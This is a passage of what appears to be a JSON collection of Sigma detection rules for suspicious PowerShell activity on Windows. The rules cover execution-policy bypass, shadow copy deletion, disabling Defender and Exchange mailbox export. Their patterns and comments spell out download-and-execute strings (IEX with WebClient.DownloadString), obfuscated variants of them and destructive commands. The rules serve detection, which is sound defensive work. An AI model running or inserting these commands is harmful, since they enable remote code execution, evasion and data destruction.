    "content": "title: PowerShell Script Change Permission Via Set-Acl\nid: bdeb2cff-af74-4094-8426-724dc937f20a\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell execution to set the ACL of a file or a folder\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cmdlet:\n        CommandLine|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n            - '-Path '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml",
    "content": "title: PowerShell Set-Acl On Windows Folder\nid: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts to set the ACL to a file in the Windows folder\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cmdlet:\n        CommandLine|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n    selection_paths:\n        # Note: Add more suspicious paths\n        CommandLine|contains:\n            - '-Path \"C:\\Windows'\n            - \"-Path 'C:\\\\Windows\"\n            - '-Path %windir%'\n            - '-Path $env:windir'\n    selection_permissions:\n        # Note: Add more suspicious permissions\n        CommandLine|contains:\n            - 'FullControl'\n            - 'Allow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml",
    "content": "title: Change PowerShell Policies to an Insecure Level\nid: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock\n      type: similar\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry\n      type: similar\nstatus: test\ndescription: Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4\n    - https://adsecurity.org/?p=2604\n    - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\nauthor: frack113\ndate: 2021-11-01\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'powershell_ise.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_option:\n        CommandLine|contains:\n            - '-executionpolicy '\n            - ' -ep '\n            - ' -exec '\n    selection_level:\n        CommandLine|contains:\n            - 'Bypass'\n            - 'Unrestricted'\n    filter_main_powershell_core:\n        ParentImage:\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains:\n            - '-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\'\n            - '-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\'\n    filter_optional_avast:\n        ParentImage|contains:\n            - 'C:\\Program Files\\Avast Software\\Avast\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\'\n            - '\\instup.exe'\n        CommandLine|contains:\n            - '-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast'\n            - '-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml",
    "content": "title: Service StartupType Change Via PowerShell Set-Service\nid: 62b20d44-1546-4e61-afce-8e175eb9473c\nstatus: test\ndescription: Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\powershell.exe'\n        - OriginalFileName: 'PowerShell.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Set-Service'\n            - '-StartupType'\n        CommandLine|contains:\n            - 'Disabled'\n            - 'Manual'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur with troubleshooting scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml",
    "content": "title: Deletion of Volume Shadow Copies via WMI with PowerShell\nid: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\nrelated:\n    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e\n      type: derived\n    - id: c1337eb8-921a-4b59-855b-4ba188ddcc42\n      type: similar\nstatus: test\ndescription: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-20\nmodified: 2022-12-30\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_get:\n        CommandLine|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n            - 'Get-CimInstance'\n            - 'gcim'\n    selection_shadowcopy:\n        CommandLine|contains: 'Win32_ShadowCopy'\n    selection_delete:\n        CommandLine|contains:\n            - '.Delete()'\n            - 'Remove-WmiObject'\n            - 'rwmi'\n            - 'Remove-CimInstance'\n            - 'rcim'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml",
    "content": "title: Exchange PowerShell Snap-Ins Usage\nid: 25676e10-2121-446e-80a4-71ff8506af47\nstatus: test\ndescription: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://www.intrinsec.com/apt27-analysis/\nauthor: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-03-24\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.collection\n    - attack.t1114\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains: 'Add-PSSnapin'\n    selection_module:\n        CommandLine|contains:\n            - 'Microsoft.Exchange.Powershell.Snapin'\n            - 'Microsoft.Exchange.Management.PowerShell.SnapIn'\n    filter_msiexec:\n        # ParentCommandLine: C:\\Windows\\System32\\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\\MSI0000\n        ParentImage: 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains: '$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml",
    "content": "title: Stop Windows Service Via PowerShell Stop-Service\nid: c49c5062-0966-4170-9efd-9968c913a6cf\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc_net_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cli:\n        CommandLine|contains: 'Stop-Service '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml",
    "content": "title: Suspicious PowerShell Download and Execute Pattern\nid: e6c54d94-498c-4562-a37c-b469d8e9a275\nrelated:\n    - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)\nreferences:\n    - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-28\nmodified: 2022-03-01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: # make sure that your backend applies the strings case-insensitive\n            - 'IEX ((New-Object Net.WebClient).DownloadString'\n            - 'IEX (New-Object Net.WebClient).DownloadString'\n            - 'IEX((New-Object Net.WebClient).DownloadString'\n            - 'IEX(New-Object Net.WebClient).DownloadString'\n            - ' -command (New-Object System.Net.WebClient).DownloadFile('\n            - ' -c (New-Object System.Net.WebClient).DownloadFile('\n    condition: selection\nfalsepositives:\n    - Software installers that pull packages from remote systems and execute them\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml",
    "content": "title: Suspicious PowerShell Parameter Substring\nid: 36210e0d-5b19-485d-a087-c096088885f0\nstatus: test\ndescription: Detects suspicious PowerShell invocation with a parameter substring\nreferences:\n    - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier\nauthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)\ndate: 2019-01-16\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -windowstyle h '\n            - ' -windowstyl h'\n            - ' -windowsty h'\n            - ' -windowst h'\n            - ' -windows h'\n            - ' -windo h'\n            - ' -wind h'\n            - ' -win h'\n            - ' -wi h'\n            - ' -win h '\n            - ' -win hi '\n            - ' -win hid '\n            - ' -win hidd '\n            - ' -win hidde '\n            - ' -NoPr '\n            - ' -NoPro '\n            - ' -NoProf '\n            - ' -NoProfi '\n            - ' -NoProfil '\n            - ' -nonin '\n            - ' -nonint '\n            - ' -noninte '\n            - ' -noninter '\n            - ' -nonintera '\n            - ' -noninterac '\n            - ' -noninteract '\n            - ' -noninteracti '\n            - ' -noninteractiv '\n            - ' -ec '\n            - ' -encodedComman '\n            - ' -encodedComma '\n            - ' -encodedComm '\n            - ' -encodedCom '\n            - ' -encodedCo '\n            - ' -encodedC '\n            - ' -encoded '\n            - ' -encode '\n            - ' -encod '\n            - ' -enco '\n            - ' -en '\n            - ' -executionpolic '\n            - ' -executionpoli '\n            - ' -executionpol '\n            - ' -executionpo '\n            - ' -executionp '\n            - ' -execution bypass'\n            - ' -executio bypass'\n            - ' -executi bypass'\n            - ' -execut bypass'\n            - ' -execu bypass'\n            - ' -exec bypass'\n            - ' -exe bypass'\n            - ' -ex bypass'\n            - ' -ep bypass'\n            - ' /windowstyle h '\n            - ' /windowstyl h'\n            - ' /windowsty h'\n            - ' /windowst h'\n            - ' /windows h'\n            - ' /windo h'\n            - ' /wind h'\n            - ' /win h'\n            - ' /wi h'\n            - ' /win h '\n            - ' /win hi '\n            - ' /win hid '\n            - ' /win hidd '\n            - ' /win hidde '\n            - ' /NoPr '\n            - ' /NoPro '\n            - ' /NoProf '\n            - ' /NoProfi '\n            - ' /NoProfil '\n            - ' /nonin '\n            - ' /nonint '\n            - ' /noninte '\n            - ' /noninter '\n            - ' /nonintera '\n            - ' /noninterac '\n            - ' /noninteract '\n            - ' /noninteracti '\n            - ' /noninteractiv '\n            - ' /ec '\n            - ' /encodedComman '\n            - ' /encodedComma '\n            - ' /encodedComm '\n            - ' /encodedCom '\n            - ' /encodedCo '\n            - ' /encodedC '\n            - ' /encoded '\n            - ' /encode '\n            - ' /encod '\n            - ' /enco '\n            - ' /en '\n            - ' /executionpolic '\n            - ' /executionpoli '\n            - ' /executionpol '\n            - ' /executionpo '\n            - ' /executionp '\n            - ' /execution bypass'\n            - ' /executio bypass'\n            - ' /executi bypass'\n            - ' /execut bypass'\n            - ' /execu bypass'\n            - ' /exec bypass'\n            - ' /exe bypass'\n            - ' /ex bypass'\n            - ' /ep bypass'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml",
    "content": "title: Suspicious PowerShell Parent Process\nid: 754ed792-634f-40ae-b3bc-e0448d33f695\nrelated:\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: derived\nstatus: test\ndescription: Detects a suspicious or uncommon parent processes of PowerShell\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26\nauthor: Teymur Kheirkhabarov, Harish Segar\ndate: 2020-03-20\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        - ParentImage|contains: 'tomcat'\n        - ParentImage|endswith:\n              - '\\amigo.exe'\n              - '\\browser.exe'\n              - '\\chrome.exe'\n              - '\\firefox.exe'\n              - '\\httpd.exe'\n              - '\\iexplore.exe'\n              - '\\jbosssvc.exe'\n              - '\\microsoftedge.exe'\n              - '\\microsoftedgecp.exe'\n              - '\\MicrosoftEdgeSH.exe'\n              - '\\mshta.exe'\n              - '\\nginx.exe'\n              - '\\outlook.exe'\n              - '\\php-cgi.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\safari.exe'\n              - '\\services.exe'\n              - '\\sqlagent.exe'\n              - '\\sqlserver.exe'\n              - '\\sqlservr.exe'\n              - '\\vivaldi.exe'\n              - '\\w3wp.exe'\n    selection_powershell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - CommandLine|contains:\n              - '/c powershell'  # FPs with sub processes that contained \"powershell\" somewhere in the command line\n              - '/c pwsh'\n        - Description: 'Windows PowerShell'\n        - Product: 'PowerShell Core 6'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Other scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml",
    "content": "title: PowerShell Script Run in AppData\nid: ac175779-025a-4f12-98b0-acdaeb77ea85\nstatus: test\ndescription: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1082851155481288706\n    - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-09\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'powershell.exe'\n            - '\\powershell'\n            - '\\pwsh'\n            - 'pwsh.exe'\n    selection2:\n        CommandLine|contains|all:\n            - '/c '\n            - '\\AppData\\'\n        CommandLine|contains:\n            - 'Local\\'\n            - 'Roaming\\'\n    condition: all of selection*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml",
    "content": "title: Powershell Token Obfuscation - Process Creation\nid: deb9b646-a508-44ee-b7c9-d8965921c6b6\nrelated:\n    - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51\n      type: similar\nstatus: test\ndescription: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation\nauthor: frack113\ndate: 2022-12-27\nmodified: 2024-08-11\ntags:\n    - attack.defense-evasion\n    - attack.t1027.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Examples:\n        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString\n        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString\n        #   &(\"{2}{3}{0}{4}{1}\"-f 'e','Expression','I','nvok','-') (&(\"{0}{1}{2}\"-f'N','ew-O','bject') Net.WebClient).DownloadString\n        - CommandLine|re: '\\w+`(\\w+|-|.)`[\\w+|\\s]'\n        # - CommandLine|re: '\\((\\'(\\w|-|\\.)+\\'\\+)+\\'(\\w|-|\\.)+\\'\\)' TODO: fixme\n        - CommandLine|re: '\"(\\{\\d\\})+\"\\s*-f'\n        #   ${e`Nv:pATh}\n        - CommandLine|re: '(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}'\n    filter_main_envpath:\n        CommandLine|contains: '${env:path}'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_uninstall_defender_feature.yml",
    "content": "title: Suspicious Uninstall of Windows Defender Feature via PowerShell\nid: c443012c-7928-43bf-ac20-7eda5efe61ad\nstatus: experimental\ndescription: |\n    Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.windows.servermanager.migration/uninstall-windowsfeature\n    - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware\nauthor: yxinmiracle\ndate: 2025-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_uninstall:\n        CommandLine|contains:\n            - 'Uninstall-WindowsFeature'\n            - 'Remove-WindowsFeature' # Only supported in Windows Server 2008 R2 and Windows 2012 R2\n    selection_cli_defender_feature:\n        CommandLine|contains: 'Windows-Defender'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml",
    "content": "title: User Discovery And Export Via Get-ADUser Cmdlet\nid: 1114e048-b69c-4f41-bc20-657245ae6e3f\nrelated:\n    - id: c2993223-6da8-4b1a-88ee-668b8bf315e9\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Get-ADUser '\n            - ' -Filter \\*'\n        CommandLine|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml",
    "content": "title: Net WebClient Casing Anomalies\nid: c86133ad-4725-4bd0-8170-210788e0a7ba\nstatus: test\ndescription: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques\nreferences:\n    - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-24\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_encoded:\n        CommandLine|contains:\n            - 'TgBlAFQALgB3AEUAQg'\n            - '4AZQBUAC4AdwBFAEIA'\n            - 'OAGUAVAAuAHcARQBCA'\n            - 'bgBFAHQALgB3AGUAYg'\n            - '4ARQB0AC4AdwBlAGIA'\n            - 'uAEUAdAAuAHcAZQBiA'\n            - 'TgBFAHQALgB3AGUAYg'\n            - 'OAEUAdAAuAHcAZQBiA'\n            - 'bgBlAFQALgB3AGUAYg'\n            - '4AZQBUAC4AdwBlAGIA'\n            - 'uAGUAVAAuAHcAZQBiA'\n            - 'TgBlAFQALgB3AGUAYg'\n            - 'OAGUAVAAuAHcAZQBiA'\n            - 'bgBFAFQALgB3AGUAYg'\n            - '4ARQBUAC4AdwBlAGIA'\n            - 'uAEUAVAAuAHcAZQBiA'\n            - 'bgBlAHQALgBXAGUAYg'\n            - '4AZQB0AC4AVwBlAGIA'\n            - 'uAGUAdAAuAFcAZQBiA'\n            - 'bgBFAHQALgBXAGUAYg'\n            - '4ARQB0AC4AVwBlAGIA'\n            - 'uAEUAdAAuAFcAZQBiA'\n            - 'TgBFAHQALgBXAGUAYg'\n            - 'OAEUAdAAuAFcAZQBiA'\n            - 'bgBlAFQALgBXAGUAYg'\n            - '4AZQBUAC4AVwBlAGIA'\n            - 'uAGUAVAAuAFcAZQBiA'\n            - 'TgBlAFQALgBXAGUAYg'\n            - 'OAGUAVAAuAFcAZQBiA'\n            - 'bgBFAFQALgBXAGUAYg'\n            - '4ARQBUAC4AVwBlAGIA'\n            - 'uAEUAVAAuAFcAZQBiA'\n            - 'bgBlAHQALgB3AEUAYg'\n            - '4AZQB0AC4AdwBFAGIA'\n            - 'uAGUAdAAuAHcARQBiA'\n            - 'TgBlAHQALgB3AEUAYg'\n            - 'OAGUAdAAuAHcARQBiA'\n            - 'bgBFAHQALgB3AEUAYg'\n            - '4ARQB0AC4AdwBFAGIA'\n            - 'uAEUAdAAuAHcARQBiA'\n            - 'TgBFAHQALgB3AEUAYg'\n            - 'OAEUAdAAuAHcARQBiA'\n            - 'bgBlAFQALgB3AEUAYg'\n            - '4AZQBUAC4AdwBFAGIA'\n            - 'uAGUAVAAuAHcARQBiA'\n            - 'TgBlAFQALgB3AEUAYg'\n            - 'OAGUAVAAuAHcARQBiA'\n            - 'bgBFAFQALgB3AEUAYg'\n            - '4ARQBUAC4AdwBFAGIA'\n            - 'uAEUAVAAuAHcARQBiA'\n            - 'TgBFAFQALgB3AEUAYg'\n            - 'OAEUAVAAuAHcARQBiA'\n            - 'bgBlAHQALgBXAEUAYg'\n            - '4AZQB0AC4AVwBFAGIA'\n            - 'uAGUAdAAuAFcARQBiA'\n            - 'TgBlAHQALgBXAEUAYg'\n            - 'OAGUAdAAuAFcARQBiA'\n            - 'bgBFAHQALgBXAEUAYg'\n            - '4ARQB0AC4AVwBFAGIA'\n            - 'uAEUAdAAuAFcARQBiA'\n            - 'TgBFAHQALgBXAEUAYg'\n            - 'OAEUAdAAuAFcARQBiA'\n            - 'bgBlAFQALgBXAEUAYg'\n            - '4AZQBUAC4AVwBFAGIA'\n            - 'uAGUAVAAuAFcARQBiA'\n            - 'TgBlAFQALgBXAEUAYg'\n            - 'OAGUAVAAuAFcARQBiA'\n            - 'bgBFAFQALgBXAEUAYg'\n            - '4ARQBUAC4AVwBFAGIA'\n            - 'uAEUAVAAuAFcARQBiA'\n            - 'TgBFAFQALgBXAEUAYg'\n            - 'OAEUAVAAuAFcARQBiA'\n            - 'bgBlAHQALgB3AGUAQg'\n            - '4AZQB0AC4AdwBlAEIA'\n            - 'uAGUAdAAuAHcAZQBCA'\n            - 'TgBlAHQALgB3AGUAQg'\n            - 'OAGUAdAAuAHcAZQBCA'\n            - 'bgBFAHQALgB3AGUAQg'\n            - '4ARQB0AC4AdwBlAEIA'\n            - 'uAEUAdAAuAHcAZQBCA'\n            - 'TgBFAHQALgB3AGUAQg'\n            - 'OAEUAdAAuAHcAZQBCA'\n            - 'bgBlAFQALgB3AGUAQg'\n            - '4AZQBUAC4AdwBlAEIA'\n            - 'uAGUAVAAuAHcAZQBCA'\n            - 'TgBlAFQALgB3AGUAQg'\n            - 'OAGUAVAAuAHcAZQBCA'\n            - 'bgBFAFQALgB3AGUAQg'\n            - '4ARQBUAC4AdwBlAEIA'\n            - 'uAEUAVAAuAHcAZQBCA'\n            - 'TgBFAFQALgB3AGUAQg'\n            - 'OAEUAVAAuAHcAZQBCA'\n            - 'bgBlAHQALgBXAGUAQg'\n            - '4AZQB0AC4AVwBlAEIA'\n            - 'uAGUAdAAuAFcAZQBCA'\n            - 'TgBlAHQALgBXAGUAQg'\n            - 'OAGUAdAAuAFcAZQBCA'\n            - 'bgBFAHQALgBXAGUAQg'\n            - '4ARQB0AC4AVwBlAEIA'\n            - 'uAEUAdAAuAFcAZQBCA'\n            - 'TgBFAHQALgBXAGUAQg'\n            - 'OAEUAdAAuAFcAZQBCA'\n            - 'bgBlAFQALgBXAGUAQg'\n            - '4AZQBUAC4AVwBlAEIA'\n            - 'uAGUAVAAuAFcAZQBCA'\n            - 'TgBlAFQALgBXAGUAQg'\n            - 'OAGUAVAAuAFcAZQBCA'\n            - 'bgBFAFQALgBXAGUAQg'\n            - '4ARQBUAC4AVwBlAEIA'\n            - 'uAEUAVAAuAFcAZQBCA'\n            - 'TgBFAFQALgBXAGUAQg'\n            - 'OAEUAVAAuAFcAZQBCA'\n            - 'bgBlAHQALgB3AEUAQg'\n            - '4AZQB0AC4AdwBFAEIA'\n            - 'uAGUAdAAuAHcARQBCA'\n            - 'TgBlAHQALgB3AEUAQg'\n            - 'OAGUAdAAuAHcARQBCA'\n            - 'bgBFAHQALgB3AEUAQg'\n            - '4ARQB0AC4AdwBFAEIA'\n            - 'uAEUAdAAuAHcARQBCA'\n            - 'TgBFAHQALgB3AEUAQg'\n            - 'OAEUAdAAuAHcARQBCA'\n            - 'bgBlAFQALgB3AEUAQg'\n            - 'uAGUAVAAuAHcARQBCA'\n            - 